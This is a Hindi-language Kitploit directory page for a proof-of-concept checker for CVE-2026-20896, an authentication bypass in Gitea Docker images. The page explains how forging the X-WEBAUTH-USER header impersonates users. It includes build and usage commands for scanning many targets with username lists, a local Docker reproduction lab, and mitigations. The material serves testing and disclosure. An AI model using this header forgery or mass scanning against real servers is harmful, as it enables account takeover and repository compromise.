Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2026-20896-gitea-poc — CVE-2026-20896 Gitea Docker X-WEBAUTH-USER प्रमाणीकरण बाईपास जाँचकर्ता | Kitploit
उपकरण/GitHubGitHub/szybnev/cve-2026-20896-gitea-poc
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंग
GitHubszybnev/cve-2026-20896-gitea-poc

cve-2026-20896-gitea-poc

CVE-2026-20896 Gitea Docker X-WEBAUTH-USER प्रमाणीकरण बाईपास जाँचकर्ता

रिपॉजिटरी देखें
101 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-20896 Gitea Docker प्रमाणीकरण बाईपास जाँचकर्ता

केवल अधिकृत रेड टीम / पेंटेस्ट संचालन के लिए।

इस रिपॉजिटरी में CVE-2026-20896 के लिए एक न्यूनतम जाँचकर्ता है, जो आधिकारिक Gitea Docker इमेजेज में 1.26.2 तक और सहित, रिवर्स-प्रॉक्सी प्रमाणीकरण सक्षम होने पर एक प्रमाणीकरण बाईपास है।

CVE-2026-20896 क्या है

प्रभावित Gitea Docker इमेजेज में निम्नलिखित app.ini टेम्पलेट शामिल था:

root@kitploit:~
REVERSE_PROXY_TRUSTED_PROXIES = *

जब कोई व्यवस्थापक सक्षम करता है:

root@kitploit:~
ENABLE_REVERSE_PROXY_AUTHENTICATION = true

Gitea किसी भी स्रोत IP से X-WEBAUTH-USER पर भरोसा करता था जो सीधे कंटेनर HTTP पोर्ट तक पहुँच सकता था। एक क्लाइंट जो इच्छित प्रमाणीकरण रिवर्स प्रॉक्सी को बाईपास करता था, एक एकल हेडर भेज सकता था और एक ज्ञात या अनुमानित उपयोगकर्ता का रूप धारण कर सकता था।

व्यावहारिक प्रभाव बिना प्रमाणीकरण के खाता प्रतिरूपण है। यदि अनुमानित उपयोगकर्ता एक व्यवस्थापक है, तो सबसे बुरी स्थिति Gitea इंस्टेंस और उसके रिपॉजिटरी का पूर्ण अनुप्रयोग-स्तरीय अधिग्रहण है। होस्ट RCE वातावरण-निर्भर है और इस जाँचकर्ता द्वारा दावा नहीं किया गया है।

पैच किए गए संस्करण 1.26.3 से शुरू होते हैं; 1.26.4 या नए में अपग्रेड करने की सिफारिश की जाती है।

PoC कैसे काम करता है

जाँचकर्ता:

  1. लक्ष्य होम पेज प्राप्त करता है।
  2. फुटर टेक्स्ट जैसे Powered by Gitea Version: 1.26.4 खोजता है।
  3. यदि पार्स किया गया संस्करण >= 1.26.3 है तो डिफ़ॉल्ट रूप से परीक्षण छोड़ देता है।
  4. प्रत्येक प्रदत्त उपयोगकर्ता नाम के लिए X-WEBAUTH-USER: <username> के साथ GET / अनुरोध भेजता है।
  5. जब लौटाया गया पेज शीर्षक उस उपयोगकर्ता के लिए लॉग-इन डैशबोर्ड जैसा दिखता है तो हिट रिपोर्ट करता है।

Go संस्करण कई लक्ष्यों, उपयोगकर्ता नाम फ़ाइलों, समवर्तीता, टाइमआउट, JSONL आउटपुट, TLS --insecure, --dry-run, और --force का समर्थन करता है।

निर्माण

root@kitploit:~
go build -o gitea-cve-2026-20896-check .

कोई तृतीय-पक्ष Go निर्भरता आवश्यक नहीं है।

उपयोग

एकल लक्ष्य:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,gitea_admin,alice

एकाधिक लक्ष्य और उपयोगकर्ता नाम:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --targets targets.txt \
  --user-file users.txt \
  --concurrency 64 \
  --timeout 8s \
  --jsonl

ड्राई रन:

root@kitploit:~
./gitea-cve-2026-20896-check \
  --url http://localhost:3000 \
  --users admin,alice \
  --dry-run

Bash फ़ॉलबैक:

root@kitploit:~
./poc.sh --url http://localhost:3000 --users admin,alice

निकास कोड

  • 0: कम से कम एक असुरक्षित प्रतिरूपण की पुष्टि हुई
  • 1: कोई असुरक्षित प्रतिरूपण की पुष्टि नहीं हुई
  • 2: उपयोग, इनपुट, या रनटाइम त्रुटि

स्थानीय पुनरुत्पादन प्रयोगशाला

निम्नलिखित प्रयोगशाला एक प्रभावित स्थानीय Gitea कंटेनर शुरू करती है और एक परीक्षण उपयोगकर्ता बनाती है:

root@kitploit:~
docker run -d --name gitea-cve-2026-20896 \
  -p 127.0.0.1:3000:3000 \
  -e GITEA__service__ENABLE_REVERSE_PROXY_AUTHENTICATION=true \
  -e GITEA__security__INSTALL_LOCK=true \
  gitea/gitea:1.26.2

sleep 15

docker exec --user git gitea-cve-2026-20896 gitea admin user create \
  --username alice \
  --password 'longpasswordhere1234' \
  --email [email protected] \
  --must-change-password=false

./gitea-cve-2026-20896-check --url http://localhost:3000 --users bob,alice,admin

अपेक्षित सकारात्मक परिणाम:

root@kitploit:~
[VULNERABLE] http://localhost:3000 user=alice title="alice - Dashboard - Gitea: Git with a cup of tea"

सफाई:

root@kitploit:~
docker rm -f gitea-cve-2026-20896

शमन

  • Gitea को 1.26.3 या नए में अपग्रेड करें; 1.26.4 या नया पसंद किया जाता है।
  • बैकएंड Gitea कंटेनर HTTP पोर्ट को सीधे अविश्वसनीय नेटवर्क पर उजागर न करें।
  • स्पष्ट रूप से विश्वसनीय रिवर्स प्रॉक्सी कॉन्फ़िगर करें।
  • रिवर्स-प्रॉक्सी प्रमाणीकरण अक्षम रखें जब तक कि नेटवर्क पथ और प्रॉक्सी विश्वास सीमा समझ में न आ जाए।

संदर्भ

  • Gitea सलाहकार: https://github.com/go-gitea/gitea/security/advisories/GHSA-f75j-4cw6-rmx4
  • Gitea रिलीज़ नोट्स 1.26.3 / 1.26.4 के लिए: https://blog.gitea.com/release-of-1.26.3-and-1.26.4/
  • फिक्स PR: https://github.com/go-gitea/gitea/pull/38151
  • CVE रिकॉर्ड: https://www.cve.org/CVERecord?id=CVE-2026-20896
  • जंगली में जांच रिपोर्ट The Hacker News / Sysdig टेलीमेट्री के माध्यम से: https://thehackernews.com/2026/07/threat-actors-probe-gitea-docker-flaw.html
टूल डाउनलोड करें